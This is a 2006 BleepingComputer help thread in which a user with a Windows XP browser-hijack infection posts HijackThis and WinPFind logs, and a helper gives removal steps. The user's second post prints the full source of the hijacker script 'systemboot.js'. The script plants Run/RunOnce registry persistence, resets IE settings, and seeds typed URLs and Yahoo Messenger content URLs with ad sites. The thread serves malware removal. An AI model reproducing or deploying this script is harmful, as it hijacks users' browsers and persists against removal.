Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Systemboot.js


  • Please log in to reply
12 replies to this topic

#1 boatpeople

boatpeople

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:41 AM

Posted 13 January 2006 - 09:34 PM

Hi,
I have found that IE popups occur periodically taking me to various Vietnamese language websites, caused presumably by movie downloads. After following the Bleeping computer procedure, I suspect a file called systemboot.js as I did not recognise it, and it was persistent after removal i.e. the regitry entries are reinstated after every reboot.

Please help identify what causes the persistence.

Log follows....

Logfile of HijackThis v1.99.1
Scan saved at 02:13:30, on 14/01/2006
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxMediaDB.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatch.exe
C:\WINDOWS\system32\slserv.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\atiptaxx.exe
C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe
C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe
C:\WINDOWS\SM1BG.EXE
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Roxio\Easy Media Creator 8\Drag to Disc\DrgToDsc.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatchTray.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Plaxo\2.6.2.7\PlaxoHelper.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Program Files\Belkin\Belkin 802.11g Wireless PCI Card Configuration Utility\utility.exe
C:\Program Files\Philips Photo Manager\Philips ThumbCam Monitor.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopDisplay.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\CPSHelpRunner.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopOE.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn0\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [AtiPTA] atiptaxx.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe"
O4 - HKLM\..\Run: [AnyDVD] C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe
O4 - HKLM\..\Run: [SM1BG] C:\WINDOWS\SM1BG.EXE
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RoxioDragToDisc] "C:\Program Files\Roxio\Easy Media Creator 8\Drag to Disc\DrgToDsc.exe"
O4 - HKLM\..\Run: [RoxWatchTray] "C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatchTray.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKLM\..\Run: [zzzz] C:\WINDOWS\inf\systemboot.js
O4 - HKLM\..\Run: [dksystem] C:\WINDOWS\inf\systemboot.js
O4 - HKLM\..\RunOnce: [zzzoom] C:\WINDOWS\inf\systemboot.js
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [PlaxoUpdate] C:\Program Files\Plaxo\2.6.2.7\PlaxoHelper.exe -a
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [zzzoom] C:\WINDOWS\inf\systemboot.js
O4 - HKCU\..\Run: [System32] C:\WINDOWS\inf\systemboot.js
O4 - HKCU\..\RunOnce: [zzzoom] C:\WINDOWS\inf\systemboot.js
O4 - HKCU\..\RunOnce: [Windows] C:\WINDOWS\inf\systemboot.js
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Belkin 802.11g Wireless PCI Card Configuration Utility.lnk = C:\Program Files\Belkin\Belkin 802.11g Wireless PCI Card Configuration Utility\utility.exe
O4 - Global Startup: Philips ThumbCam Monitor.lnk = C:\Program Files\Philips Photo Manager\Philips ThumbCam Monitor.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://C:\Program Files\Google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra button: Messenger - {4528BBE0-4E08-11D5-AD55-00010333D0AD} - C:\PROGRA~1\Yahoo!\Common\yhexbmesuk.dll
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {4528BBE0-4E08-11D5-AD55-00010333D0AD} - C:\PROGRA~1\Yahoo!\Common\yhexbmesuk.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} - http://download.bitdefender.com/resources/scan8/oscan8.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1126814900650
O16 - DPF: {6E5A37BF-FD42-463A-877C-4EB7002E68AE} (Housecall ActiveX 6.5) - http://eu-housecall.trendmicro-europe.com/...ivex/hcImpl.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
O23 - Service: LiveShare P2P Server (RoxLiveShare) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxLiveShare.exe
O23 - Service: RoxMediaDB - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxMediaDB.exe
O23 - Service: RoxUpnpRenderer (RoxUPnPRenderer) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCom\RoxUpnpRenderer.exe
O23 - Service: RoxUpnpServer - Sonic Solutions - C:\Program Files\Roxio\Easy Media Creator 8\Digital Home\RoxUpnpServer.exe
O23 - Service: Roxio Hard Drive Watcher (RoxWatch) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatch.exe
O23 - Service: SmartLinkService (SLService) - - C:\WINDOWS\SYSTEM32\slserv.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe

BC AdBot (Login to Remove)

 


m

#2 boatpeople

boatpeople
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:41 AM

Posted 13 January 2006 - 10:27 PM

I have located the file systemboot.js which is obviously the offending file, see below, however now Windows is reporting an error upon startup as it wants to run this java script.

/*Chung toi da giup ban go bo nhung rac roi ma nhung website khac gay ra*/
/*Chung toi da go bo trang chu thanh "about:blank", "TaskMgr" va Mo an Homepage tren Internet Options */
/*Va tat nhien chung toi cung co chen quang cao nua!, tuy nhien quang cao cua chung it va co the chap nhan duoc*/
/*Ban co the delete file nay nhung nhung rac roi nhu cuop trang chu tu nhung website khac se tan cong ban*/

var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\inf\\systemboot.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\New Windows\\PopupMgr","no");
Shell.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage",0,"REG_DWORD"); /*Chung toi khg cai phan nay, chi go bo no giup ban thoi*/
Shell.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr",0,"REG_DWORD"); /*Chung toi khg cai phan nay, chi go bo no giup ban thoi*/
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer"); /*Chung toi khg cai phan nay, chi go bo no giup ban thoi*/
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\zzzoom",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zzzoom",filepath);
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\zzzz",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\System32",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Windows",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zzzoom",filepath);
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zzzoom",filepath);
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dksystem",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank"); /*Chung toi khg cai phan nay, chi go bo no giup ban thoi*/
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://vn-n.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://hayhay.net.tc");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url5","http://nghenhacso.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url6","http://hinhvui.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url7","http://ketquabongda.info.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url8","http://googles.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url9","http://honganchat.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url10","http://vuonnhac.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url11","http://vuontruyen.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url12","http://anyfreetime.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url13","http://choigame.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url14","http://nhantuonghoc.net.tf");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url15","http://nauan.net.ms");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url16","http://itv.net.tc");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Launchcast\\content url","http://vnexpress.net.tf");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Calendar\\content url","http://keepme.net.ms");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Games\\content url","http://keepme.net.ms");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Weather\\content url","http://keepme.net.ms");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_buzz\\content url","http://keepme.net.ms");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Yahoo360\\content url","http://keepme.net.ms");
:thumbsup:

#3 Daisuke

Daisuke

    Cleaner on Duty


  • Members
  • 5,575 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Romania
  • Local time:10:41 PM

Posted 20 January 2006 - 06:55 PM

Hi,

Sorry for this delay. Post please a fresh hijackthis log if you still have problems.
Everyday is virus day. Do you know where your recovery CDs are ?
Did you create them yet ?

Posted Image

#4 boatpeople

boatpeople
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:41 AM

Posted 21 January 2006 - 10:29 AM

Despite isolating offending java script files I still have a hijack infection with rogue websites popping up randomly. Example sites are:
http://anyfreetime.com/
http://www.geocities.jp
http://amthuc.hongannet.com (Vietnamese)

The text within systemboot.js roughly translated says that removal of the file will not remove the infection, however I note that it no longer resets homepage to about:blank.

Current hijack log:

Logfile of HijackThis v1.99.1
Scan saved at 14:35:58, on 21/01/2006
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxMediaDB.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatch.exe
C:\WINDOWS\system32\slserv.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\atiptaxx.exe
C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe
C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe
C:\WINDOWS\SM1BG.EXE
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Roxio\Easy Media Creator 8\Drag to Disc\DrgToDsc.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatchTray.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Plaxo\2.6.2.7\PlaxoHelper.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Program Files\Belkin\Belkin 802.11g Wireless PCI Card Configuration Utility\utility.exe
C:\Program Files\Philips Photo Manager\Philips ThumbCam Monitor.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopDisplay.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\Common Files\Roxio Shared\SharedCOM8\CPSHelpRunner.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopOE.exe
C:\WINDOWS\System32\msiexec.exe
C:\Program Files\HijackThis\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [AtiPTA] atiptaxx.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe"
O4 - HKLM\..\Run: [AnyDVD] C:\Program Files\SlySoft\AnyDVD\AnyDVD.exe
O4 - HKLM\..\Run: [SM1BG] C:\WINDOWS\SM1BG.EXE
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RoxioDragToDisc] "C:\Program Files\Roxio\Easy Media Creator 8\Drag to Disc\DrgToDsc.exe"
O4 - HKLM\..\Run: [RoxWatchTray] "C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatchTray.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [PlaxoUpdate] C:\Program Files\Plaxo\2.6.2.7\PlaxoHelper.exe -a
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Belkin 802.11g Wireless PCI Card Configuration Utility.lnk = C:\Program Files\Belkin\Belkin 802.11g Wireless PCI Card Configuration Utility\utility.exe
O4 - Global Startup: Philips ThumbCam Monitor.lnk = C:\Program Files\Philips Photo Manager\Philips ThumbCam Monitor.exe
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://C:\Program Files\Google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1126814900650
O16 - DPF: {6E5A37BF-FD42-463A-877C-4EB7002E68AE} (Housecall ActiveX 6.5) - http://eu-housecall.trendmicro-europe.com/...ivex/hcImpl.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0326DFAD-BC5A-4A9C-BB52-F7473E358E65}: NameServer = 192.168.1.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0326DFAD-BC5A-4A9C-BB52-F7473E358E65}: NameServer = 192.168.1.1
O17 - HKLM\System\CS2\Services\Tcpip\..\{0326DFAD-BC5A-4A9C-BB52-F7473E358E65}: NameServer = 192.168.1.1
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
O23 - Service: LiveShare P2P Server (RoxLiveShare) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxLiveShare.exe
O23 - Service: RoxMediaDB - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxMediaDB.exe
O23 - Service: RoxUpnpRenderer (RoxUPnPRenderer) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCom\RoxUpnpRenderer.exe
O23 - Service: RoxUpnpServer - Sonic Solutions - C:\Program Files\Roxio\Easy Media Creator 8\Digital Home\RoxUpnpServer.exe
O23 - Service: Roxio Hard Drive Watcher (RoxWatch) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\SharedCOM8\RoxWatch.exe
O23 - Service: SmartLinkService (SLService) - - C:\WINDOWS\SYSTEM32\slserv.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe

#5 Daisuke

Daisuke

    Cleaner on Duty


  • Members
  • 5,575 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Romania
  • Local time:10:41 PM

Posted 21 January 2006 - 10:50 AM

Hi

This is a temporary fix. >>>>>
Download Symatec's noscript.exe to your desktop.
Double-click the Noscript.exe icon. The Norton Script Disabler/Enabler appears.

If the WSH is currently enabled on the system, you will be prompted as to whether you want to disable it.
To do so, click Disable, and then click OK.
Note: Disabling the WSH will prevent all the scripts from running on the system.
<<<<<

Let's have a deeper look:
Download WinPFind!
  • Extract WinPFind.zip to your c:\ folder.
  • Reboot your computer into Safe Mode
  • Then open c:\WinPFind and double-click on WinPFind.exe.
  • When the program is open, click on the Start Scan button to start scanning your computer.
  • Be patient as this scan may take a while. When it is done, it will show a log and tell you the scan is completed.
  • Reboot your computer back to normal mode and and post the contents of c:\WinPFind\WinPFind.txt as a reply to this topic.

Everyday is virus day. Do you know where your recovery CDs are ?
Did you create them yet ?

Posted Image

#6 boatpeople

boatpeople
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:41 AM

Posted 21 January 2006 - 12:22 PM

Additional information: The computer plays a 'launch' sound at startup which I strongly link to the infection as I can't determine what else is driving it. Occasionally I get popups requesting a CD-ROM, possibly related to Roxio Drag-to-disk.

Here is the logfile...


WARNING: not all files found by this scanner are bad. Consult with a knowledgable person before proceeding.

If you see a message in the titlebar saying "Not responding..." you can ignore it. Windows somethimes displays this message due to the high volume of disk I/O. As long as the hard disk light is flashing, the program is still working properly.

Windows OS and Versions
Product Name: Microsoft Windows XP Current Build: Current Build Number: 2600
Internet Explorer Version: 6.0.2600.0000

Checking Selected Standard Folders

Checking %SystemDrive% folder...
qoologic 21/01/2006 16:30:20 204131 C:\WinPFind.zip

Checking %ProgramFilesDir% folder...

Checking %WinDir% folder...

Items found in C:\WINDOWS\hosts


Checking %System% folder...
PEC2 23/08/2001 12:00:00 41397 C:\WINDOWS\SYSTEM32\dfrg.msc
PECompact2 04/01/2006 19:46:40 2827616 C:\WINDOWS\SYSTEM32\MRT.exe
aspack 04/01/2006 19:46:40 2827616 C:\WINDOWS\SYSTEM32\MRT.exe
Umonitor 12/02/2002 17:14:12 630784 C:\WINDOWS\SYSTEM32\rasdlg.dll
winsync 23/08/2001 12:00:00 1309184 C:\WINDOWS\SYSTEM32\wbdbase.deu

Checking %System%\Drivers folder and sub-folders...
PTech 16/05/2002 10:41:32 1805696 C:\WINDOWS\SYSTEM32\drivers\mtlstrm.sys
UPX! 09/11/2005 20:07:30 1022432 C:\WINDOWS\SYSTEM32\drivers\VsapiNT.sys
aspack 09/11/2005 20:07:30 1022432 C:\WINDOWS\SYSTEM32\drivers\VsapiNT.sys

Items found in C:\WINDOWS\SYSTEM32\drivers\etc\hosts


Checking the Windows folder and sub-folders for system and hidden files within the last 60 days...
21/01/2006 16:34:38 S 2048 C:\WINDOWS\bootstat.dat
21/01/2006 16:34:32 H 8192 C:\WINDOWS\system32\config\default.LOG
21/01/2006 16:34:56 H 1024 C:\WINDOWS\system32\config\SAM.LOG
21/01/2006 16:34:40 H 20480 C:\WINDOWS\system32\config\SECURITY.LOG
21/01/2006 16:37:32 H 81920 C:\WINDOWS\system32\config\software.LOG
21/01/2006 16:34:28 H 3260416 C:\WINDOWS\system32\config\system.LOG
14/01/2006 12:36:10 H 1024 C:\WINDOWS\system32\config\systemprofile\ntuser.dat.LOG
15/12/2005 04:01:22 HS 388 C:\WINDOWS\system32\Microsoft\Protect\S-1-5-18\User\0bbd2d7f-b258-41f7-8904-6b16728204fa
15/12/2005 04:01:22 HS 24 C:\WINDOWS\system32\Microsoft\Protect\S-1-5-18\User\Preferred
21/01/2006 16:32:56 H 6 C:\WINDOWS\Tasks\SA.DAT
11/01/2006 16:00:14 H 402 C:\WINDOWS\Tasks\{395530B0-D8C3-4B94-AC47-965A353958DC}_BOATPEOPLE_Malcolm.job
13/01/2006 09:00:02 H 402 C:\WINDOWS\Tasks\{7B3C88EF-00A3-487F-9293-40370B437F19}_BOATPEOPLE_Malcolm.job
06/01/2006 16:00:02 H 402 C:\WINDOWS\Tasks\{E5744F80-8294-4CBF-8A66-B5052AB90C4A}_BOATPEOPLE_Malcolm.job

Checking for CPL files...
